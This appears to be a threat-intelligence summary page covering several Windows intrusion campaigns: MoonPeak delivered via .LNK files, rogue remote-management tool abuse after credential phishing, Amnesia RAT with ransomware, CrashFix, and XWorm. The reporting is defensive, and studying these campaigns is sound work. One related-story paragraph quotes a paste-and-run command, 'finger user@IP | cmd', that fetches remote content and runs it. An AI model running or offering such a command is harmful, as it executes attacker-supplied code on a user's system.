Threat actors abuse shortcut files and legitimate RMM tools to gain persistent access to Windows systems
Threat actors are increasingly relying on living-off-the-land techniques and trusted tooling to establish persistent access on Windows endpoints. One campaign used weaponized Windows shortcut (.LNK) files disguised as investment-related PDFs to deliver MoonPeak, a remote access trojan assessed as a XenoRAT variant and linked to North Korea–aligned activity targeting South Korean investors and cryptocurrency traders. Opening the .LNK launches an obfuscated PowerShell-driven, multi-stage infection chain while displaying a decoy PDF; analysis also tied payload hosting to attacker-controlled GitHub repositories, reflecting “Living Off Trusted Sites (LOTS)” tradecraft.
A separate dual-wave intrusion chain used phishing emails masquerading as Greenvelope invitations to steal webmail credentials (e.g., Outlook, Yahoo, AOL), then used the compromised accounts to register for and silently deploy LogMeIn Resolve (formerly GoTo Resolve) for persistent remote access. The installer (GreenVelopeCard.exe) was described as signed and configured to connect to attacker-controlled infrastructure, with follow-on actions including modifying service settings for elevated access and creating hidden scheduled tasks for resilience. Related threat intelligence reporting also highlighted broader “rogue RMM” abuse trends, including Remcos and NetSupport Manager delivery via paste-and-run lures and PowerShell/cmd execution chains (including use of the finger utility to fetch remote payloads), underscoring that adversaries are operationalizing legitimate remote administration software as a stealthy backdoor mechanism.
Related Entities
Organizations
Affected Products
Sources
Related Stories
Phishing campaigns using Windows LNK files and PowerShell loaders to deliver RATs and ransomware
Multiple recent intrusion reports describe **phishing-led Windows compromises** that rely on **weaponized `.LNK` shortcuts** to trigger **obfuscated PowerShell** execution, display decoy documents, and then fetch additional payloads from public cloud/code platforms. In South Korea, attackers distributed an LNK disguised as financial trading guidance that opens a decoy PDF while running PowerShell; subsequent stages perform anti-analysis/virtualization checks, establish persistence, and retrieve a masked executable from **GitHub** that decrypts code at runtime to run **MoonPeak** malware. Researchers assessed the activity as likely **North Korea–linked** based on GitHub commit metadata and naming patterns. A separate Russia-targeted campaign used business-themed archives containing decoy documents and a malicious LNK to pull a PowerShell loader that establishes persistence and then weakens defenses (including **Microsoft Defender exclusion changes** and use of **`defendnot`**), performs reconnaissance, and tampers with system tooling and file associations before deploying **Amnesia RAT** (fetched from **Dropbox**) and a **Hakuna Matata–derived ransomware** payload for encryption. By contrast, reporting on **KazakRAT** describes a different espionage operation in Kazakhstan/Afghanistan delivered via malicious **MSI** installers and using simple, unencrypted HTTP C2; it is not part of the LNK/PowerShell delivery chains described in the other incidents.
1 months ago
Malware Delivery via Social Engineering: Phishing Lures, Fake Browser Alerts, and Paste-and-Run Payloads
Multiple threat reports describe **social-engineering-driven malware delivery** leading to remote access and follow-on payload deployment. Fortinet observed a **multi-stage phishing campaign targeting users in Russia** that delivers **Amnesia RAT** and ransomware via business-themed decoy documents and a malicious `.lnk` shortcut using a double extension (e.g., `*.txt.lnk`). The infection chain uses public cloud services for staging—**GitHub** for scripts and **Dropbox** for binary payloads—and abuses **defendnot** to trick Windows into believing a third-party AV is installed, effectively disabling **Microsoft Defender** before later-stage execution. Separately, Huntress attributed activity to **KongTuke**, which uses **malicious browser extensions** to display fake “browser crash” security alerts (“**CrashFix**”) that pressure users into running attacker-provided commands, and also deploys a Python RAT dubbed **ModeloRAT**. ModeloRAT is described as heavily obfuscated, using **Windows Registry** persistence and **RC4**-encrypted communications, with the ability to deliver additional payloads (DLLs, executables, scripts). Red Canary’s January intelligence update highlights **Scarlet Goldfinch** activity using **paste-and-run** lures and a notable technique of using the Windows `finger` client to pull remote content (e.g., `finger user@IP | cmd`), followed by `curl` download of an archive masquerading as a PDF and extraction via `tar -xf`, culminating in **Remcos** (and sometimes **NetSupport**) delivered via **DLL sideloading**.
1 months ago
Phishing-Delivered Remote Access Trojans and Backdoors Using Living-off-the-Land Execution
Multiple reporting described **phishing-led intrusions** that establish long-term remote access on victim endpoints using a mix of commodity RATs and layered backdoors. Indian defense and government-aligned organizations were targeted in campaigns attributed to Pakistan-aligned clusters **APT36/Transparent Tribe** and **SideCopy**, using malicious attachments/links to deliver Windows and Linux payloads including **Geta RAT**, **Ares RAT**, and **DeskRAT**. One documented Windows chain used a malicious `LNK` that invoked `mshta.exe` to run a remote HTA, which then decrypted and launched a DLL payload, reflecting continued reliance on living-off-the-land binaries and multi-stage loaders to maintain persistence and enable data theft and post-compromise operations across platforms. Separately, a newly reported **CrashFix** campaign backdoored Windows by socially engineering users to run a command via the Windows Run dialog, then using Windows tools and in-memory scripts to deploy a primary **Python implant** plus additional Python scripts and a reflectively loaded DLL backdoor, followed by network mapping and **Active Directory** targeting—behavior consistent with interactive intrusion/access-brokerage tradecraft. FortiGuard Labs also detailed a phishing campaign delivering a new **XWorm** variant via a malicious Excel attachment exploiting `CVE-2018-0802` to fetch an HTA, trigger PowerShell, and load a fileless .NET module that uses process hollowing to inject XWorm into `Msbuild.exe`, alongside analysis of encrypted C2 traffic and plugin-based capabilities enabling full remote control of compromised Windows systems.
1 months ago